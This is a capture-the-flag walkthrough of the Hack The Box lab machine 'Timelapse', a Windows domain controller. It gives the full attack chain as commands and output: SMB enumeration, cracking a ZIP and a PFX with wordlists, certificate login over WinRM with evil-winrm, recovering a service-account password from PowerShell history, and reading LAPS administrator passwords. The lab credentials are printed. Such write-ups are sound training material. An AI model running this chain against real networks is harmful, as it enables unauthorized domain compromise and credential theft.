Timelapse

Overview

A Windows machine releases at 03/26/22 and features:

  • Active Directory

  • SMB Shares

  • LAPS

  • LDAP

  • Crack Encrypted ZIP and PKCS12

  • WinRM Certificate-based Authentication

  • PowerShell History

Reconnaissance

General Information

  • Host name dc01.timelapse.htb

  • Domain name timelapse.htb

  • WinRM over https got a expired TLS certificate

Port Scanning

  • TCP

    • Stealthy scanned

    • Opened ports 53, 88(Kerberos), 135, 139, 389, 5986(WinRM/HTTPs)...

    • Revealing this is a DC, Domain Controller

    • Domain timelapse.htb0

  • UDP, Top-500

    • 53, 123, 389

LDAP

  • Null bind test fails

$ ldapsearch -x -b 'dc=timelapse,dc=htb0'

SMB

  • Got some shares on target

    $ smbclient -U '' --no-pass -L //dc01.timelapse.htb

		Sharename       Type      Comment
		---------       ----      -------
SMB1 disabled -- no workgroup available
$ smbclient -U '' -L //dc01.timelapse.htb
Enter WORKGROUP\'s password:

		Sharename       Type      Comment
		---------       ----      -------
		ADMIN$          Disk      Remote Admin
		C$              Disk      Default share
		IPC$            IPC       Remote IPC
		NETLOGON        Disk      Logon server share
		Shares          Disk
		SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available

  • On the \\dc01.timelapse.htb\Shares found

    • folder HelpDesk containing LAPS related document

    • folder Dev contains a encrypted file winrm_backup.zip

    • SYSVOL and NETLOGON got access denied

Initial Access

Crack ZIP encryption

  • Use zip2john get the encrypted zip file hash

$ zip2john winrm_backup.zip > zip.hash

  • Crack the hash by john and get password supremelegacy

──╼ $sudo john -wordlist:/home/htb-jackx8x7x/Desktop/Useful\ Repos/SecLists/Passwords/Leaked-Databases/rockyou.txt zip.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-03-28 05:23) 2.857g/s 9924Kp/s 9924Kc/s 9924KC/s surfrox1391..supergau
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Crack PKCS12

  • Unzip the zip file get a file legacyy_dev_auth.pfx string legacyy@timelapse.htb

    • Which is protected by a passphrase

  • Crack by crackpkcs12

$sudo crackpkcs12 -d /home/htb-jackx8x7x/Desktop/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt ~/my_data/machine/timelapse/smb/legacyy_dev_auth.pfx

Dictionary attack - Starting 4 threads

*********************************************************
Dictionary attack - Thread 4 - Password found: thuglegacy
*********************************************************

WinRM

We can use this file authenticating with the target over WinRM

  • Extract the private key from the .pfx file

    $ openssl pkcs12 -in [yourfile.pfx] -nocerts -out [drlive.key]
$ openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [drlive.crt]
$ evil-winrm -c cert -k key -i <IP> -S

Enumeration

Current User

  • timelapse\legacyy

  • Privileges

    • SeMachineAccountPrivilege

    • SeIncreaseWorkingSetPrivilege

  • Groups

    • Remote Management Users

    • Pre-Windows 2000 Compatible Access

    • TIMELAPSE\Development

Active Directory

  • Compuer Accounts

    • DC01, DB01, WEB01, DEV01

    PS C:\> Get-ADComputer -Filter *

  • Users

    *Evil-WinRM* PS C:\Users\legacyy\Documents> get-aduser -filter *|select distinguishedname

distinguishedname
-----------------
CN=Administrator,CN=Users,DC=timelapse,DC=htb
CN=Guest,CN=Users,DC=timelapse,DC=htb
CN=krbtgt,CN=Users,DC=timelapse,DC=htb
CN=TheCyberGeek,OU=Admins,OU=Staff,DC=timelapse,DC=htb
CN=Payl0ad,OU=Admins,OU=Staff,DC=timelapse,DC=htb
CN=Legacyy,OU=Dev,OU=Staff,DC=timelapse,DC=htb
CN=Sinfulz,OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb
CN=Babywyrm,OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb
CN=svc_deploy,CN=Users,DC=timelapse,DC=htb
CN=TRX,OU=Admins,OU=Staff,DC=timelapse,DC=htb

LAPS

  • Check for the LAPS password attribute ms-mcs-admpwd

PS C:\> Get-ADObject 'CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=timelapse,DC=htb'

Privilege Escalation

  • By list files recursive, found the PowerShell history

  • Alternatively, run the command Get-PSReadlineOption

    PS C:\> gci -recurse -file -force -erraction ignore | ?{<some filter>}

  • And we get the password for user svc_deploy

  • who is the member of the LAPS_Readers group

*Evil-WinRM* PS C:\Users\legacyy> get-content C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\Con*
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

  • We can read the local administrator password by

Evil-WinRM* PS C:\> get-adobject -filter 'objectclass -eq "computer"' -properties ms-mcs-admpwd


DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-mcs-admpwd     : Me78u5,z{ml+N4VNl,rl)GxA
Name              : DC01
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f

Reference

PreviousEscapeNextSupport

Last updated